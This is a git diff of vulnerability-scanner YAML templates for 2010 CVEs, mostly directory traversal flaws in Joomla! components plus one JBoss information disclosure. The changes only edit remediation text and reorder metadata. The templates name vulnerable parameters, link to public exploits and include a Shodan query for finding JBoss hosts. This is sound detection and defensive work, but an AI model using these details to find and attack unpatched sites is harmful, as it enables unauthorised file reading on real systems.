Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/11999 - https://nvd.nist.gov/vuln/detail/CVE-2010-1315 - http://packetstormsecurity.org/1004-exploits/joomlaweberpcustomer-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/57482 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1315 cwe-id: CWE-22 epss-score: 0.0087 - cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:* epss-percentile: 0.80286 + cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomlamo diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index d6e3c28d00..1454f31ec2 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/33797 - https://nvd.nist.gov/vuln/detail/CVE-2010-1340 - http://packetstormsecurity.org/1003-exploits/joomlajresearch-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/57123 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1340 cwe-id: CWE-22 epss-score: 0.01155 - cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:* epss-percentile: 0.8306 + cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla-research diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 468389f448..d8967d0bab 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/15453 - https://nvd.nist.gov/vuln/detail/CVE-2010-1345 - http://www.exploit-db.com/exploits/11785 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1345 cwe-id: CWE-22 epss-score: 0.00477 - cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:* epss-percentile: 0.72681 + cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cookex diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 53aff88ca4..96840d095a 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the JOOFORGE Jutebox (com_jukebox) component 1.0 and 1.7 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12084 - https://nvd.nist.gov/vuln/detail/CVE-2010-1352 - http://packetstormsecurity.org/1004-exploits/joomlajukebox-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1352 cwe-id: CWE-22 epss-score: 0.00477 - cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* epss-percentile: 0.72681 + cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: jooforge diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 4ac76de77b..f3daabf11c 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: | + Apply the latest security patches or updates provided by Joomla! to fix the LFI vulnerability in LoginBox component. reference: - https://www.exploit-db.com/exploits/12068 - https://nvd.nist.gov/vuln/detail/CVE-2010-1353 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1353 cwe-id: CWE-22 epss-score: 0.01751 - cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* epss-percentile: 0.86395 + cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wowjoomla diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index e5c008b4b7..bdf5759e4b 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12102 - https://nvd.nist.gov/vuln/detail/CVE-2010-1354 - http://packetstormsecurity.org/1004-exploits/joomlavjdeo-lfi.txt - http://www.exploit-db.com/exploits/12102 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1354 cwe-id: CWE-22 epss-score: 0.00477 - cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* epss-percentile: 0.72681 + cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ternaria diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index c60d6e1a89..0f6913faae 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Red Hat JBoss Enterprise Application Platform 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 is susceptible to sensitive information disclosure. A remote attacker can obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression. + remediation: | + Apply the necessary patches or updates provided by Red Hat to fix the vulnerability. reference: - https://rhn.redhat.com/errata/RHSA-2010-0377.html - https://nvd.nist.gov/vuln/detail/CVE-2010-1429 @@ -18,14 +20,14 @@ info: cve-id: CVE-2010-1429 cwe-id: CWE-264 epss-score: 0.00573 - cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* epss-percentile: 0.75122 + cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: title:"JBoss" verified: true + max-request: 1 vendor: redhat product: jboss_enterprise_application_platform + shodan-query: title:"JBoss" tags: cve,cve2010,jboss,eap,tomcat,exposure http: diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 66b851ad39..5d6536e4eb 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12232 - https://nvd.nist.gov/vuln/detail/CVE-2010-1461 - http://www.exploit-db.com/exploits/12232 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1461 cwe-id: CWE-22 epss-score: 0.00477 - cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* epss-percentile: 0.72681 + cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gogoritas diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index f6f72c62b6..d1db2b2453 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12146 - https://nvd.nist.gov/vuln/detail/CVE-2010-1469 - http://packetstormsecurity.org/1004-exploits/joomlajprojectmanager-lfi.txt - http://www.exploit-db.com/exploits/12146 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1469 cwe-id: CWE-22 epss-score: 0.00813 - cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* epss-percentile: 0.79614 + cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ternaria diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index f2b0e3ea81..6771437e12 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Web TV (com_webtv) component 1.0 for Joomla! allows remote attackers to read arbitrary files and have possibly other unspecified impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12166 - https://nvd.nist.gov/vuln/detail/CVE-2010-1470 - http://www.exploit-db.com/exploits/12166 - http://www.vupen.com/english/advisories/2010/0858 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1470 cwe-id: CWE-22 epss-score: 0.04616 - cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* epss-percentile: 0.915 + cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dev.pucit.edu.pk diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 0aa2c1efaa..6691ff24e5 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component Address Book or apply the necessary patches to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12170 - https://nvd.nist.gov/vuln/detail/CVE-2010-1471 @@ -15,8 +17,8 @@ info: cve-id: CVE-2010-1471 cwe-id: CWE-22 epss-score: 0.05684 - cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* epss-percentile: 0.92341 + cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: b-elektro diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index 535d357eaa..a6fcf585b5 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Daily Horoscope (com_horoscope) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12167 - https://nvd.nist.gov/vuln/detail/CVE-2010-1472 - http://www.exploit-db.com/exploits/12167 - http://www.vupen.com/english/advisories/2010/0859 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1472 cwe-id: CWE-22 epss-score: 0.05684 - cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:* epss-percentile: 0.92341 + cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: kazulah diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 25649c6daf..ef4a2ff52b 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12171 - https://nvd.nist.gov/vuln/detail/CVE-2010-1473 - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1473 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* metadata: max-request: 1 vendor: johnmccollum diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index c1435e2dce..fa9ce49ac6 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component Sweetykeeper or apply the necessary patches to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12182 - https://nvd.nist.gov/vuln/detail/CVE-2010-1474 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1474 cwe-id: CWE-22 epss-score: 0.01242 - cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* epss-percentile: 0.83796 + cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: supachai_teasakul diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index 0ee5dfc572..1d1f90edfb 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component Preventive And Reservation and apply any available patches or fixes to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12147 - https://nvd.nist.gov/vuln/detail/CVE-2010-1475 @@ -16,8 +18,8 @@ info: cve-id: CVE-2010-1475 cwe-id: CWE-22 epss-score: 0.01242 - cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* epss-percentile: 0.83796 + cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ternaria diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index f984bbb180..630b46689f 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12150 - https://nvd.nist.gov/vuln/detail/CVE-2010-1476 - http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt - http://www.alphaplug.com/ - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1476 cwe-id: CWE-22 epss-score: 0.03527 - cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* epss-percentile: 0.90353 + cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: alphaplug diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 545620e7e5..8e0ff4a512 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -5,18 +5,18 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12145 - https://nvd.nist.gov/vuln/detail/CVE-2010-1478 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-1478 cwe-id: CWE-22 epss-score: 0.00826 - cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:* epss-percentile: 0.79783 + cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ternaria diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 6a7f36b307..54f60dd657 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the MMS Blog (com_mmsblog) component 2.3.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12318 - https://nvd.nist.gov/vuln/detail/CVE-2010-1491 - http://packetstormsecurity.org/1004-exploits/joomlammsblog-lfi.txt - http://www.exploit-db.com/exploits/12318 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1491 cwe-id: CWE-22 epss-score: 0.00477 - cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:* epss-percentile: 0.72681 + cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mms.pipp diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 4ee5643791..8a9fadb58a 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12113 - https://nvd.nist.gov/vuln/detail/CVE-2010-1494 - http://www.exploit-db.com/exploits/12113 - http://www.awdwall.com/index.php/awdwall-updates-logs- - https://exchange.xforce.ibmcloud.com/vulnerabilities/57693 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1494 cwe-id: CWE-22 epss-score: 0.02305 - cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* epss-percentile: 0.88291 + cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 vendor: awdsolution diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index f508d03731..66337f19c8 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12286 - https://nvd.nist.gov/vuln/detail/CVE-2010-1495 - http://www.vupen.com/english/advisories/2010/0929 - http://packetstormsecurity.org/1004-exploits/joomlamatamko-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1495 cwe-id: CWE-22 epss-score: 0.04503 - cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:* epss-percentile: 0.91406 + cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:* metadata: max-request: 1 vendor: matamko diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index f0253a9139..a6de5422e5 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -5,21 +5,21 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12054 - https://nvd.nist.gov/vuln/detail/CVE-2010-1531 - http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt - http://redcomponent.com/redshop/redshop-changelog - https://exchange.xforce.ibmcloud.com/vulnerabilities/57512 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1531 cwe-id: CWE-22 epss-score: 0.01815 - cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* epss-percentile: 0.8667 + cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: redcomponent diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index b196f3401a..2c091c5017 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12118 - https://nvd.nist.gov/vuln/detail/CVE-2010-1532 - http://packetstormsecurity.org/1004-exploits/joomlapowermail-lfi.txt - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1532 cwe-id: CWE-22 epss-score: 0.00477 - cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* epss-percentile: 0.72681 + cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 vendor: givesight diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index d920fcd682..ec75c49e54 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -5,19 +5,19 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/12142 - https://nvd.nist.gov/vuln/detail/CVE-2010-1533 - http://www.exploit-db.com/exploits/12142 - remediation: Upgrade to a supported version. classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1533 cwe-id: CWE-22 epss-score: 0.00706 - cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* epss-percentile: 0.77913 + cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: peter_hocherl diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 7d8b130dc8..03fbdce2cf 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -5,20 +5,20 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + remediation: Upgrade to a supported version reference: - https://www.exploit-db.com/exploits/12067 - https://nvd.nist.gov/vuln/detail/CVE-2010-1534 - http://www.exploit-db.com/exploits/12067 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57534 - remediation: Upgrade to a supported version classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2010-1534 cwe-id: CWE-22 epss-score: 0.01733 - cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* epss-percentile: 0.86312 + cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: joomla.batjo diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 1ff777c473..97e2f8b680 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: A directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. + remediation: | + Update to the latest version of Joomla! Component TRAVELbook or apply the necessary patches to fix the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/12151 - https://nvd.nist.gov/vuln/detail/CVE-2010-1535 @@ -15,8 +17,8 @@ info: cve-id: CVE-2010-1535 cwe-id: CWE-22 epss-score: 0.00706 - cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* epss-percentile: 0.77913 + cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: peter_hocherl diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 9c1d30b875..4e5fb08797 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in index.php in the MyBlog (com_myblog) component 3.0.329 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the task parameter. + remediation: | + Apply the latest security patches or updates provided by Joomla! to fix the directory traversal vulnerability in com_blog component. reference: - https://www.exploit-db.com/exploits/11625 - https://nvd.nist.gov/vuln/detail/CVE-2010-1540 @@ -14,8 +16,8 @@ info: cve-id: CVE-2010-1540 cwe-id: CWE-22 epss-score: 0.0045 - cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:* epss-percentile: 0.71928 + cpe: cpe:2.3:a:myblog:com_myblog:3.0.329:*:*:*:*:*:*:* metadata: max-request: 1 vendor: myblog diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index 3f61382602..4d70f603eb 100644 --- 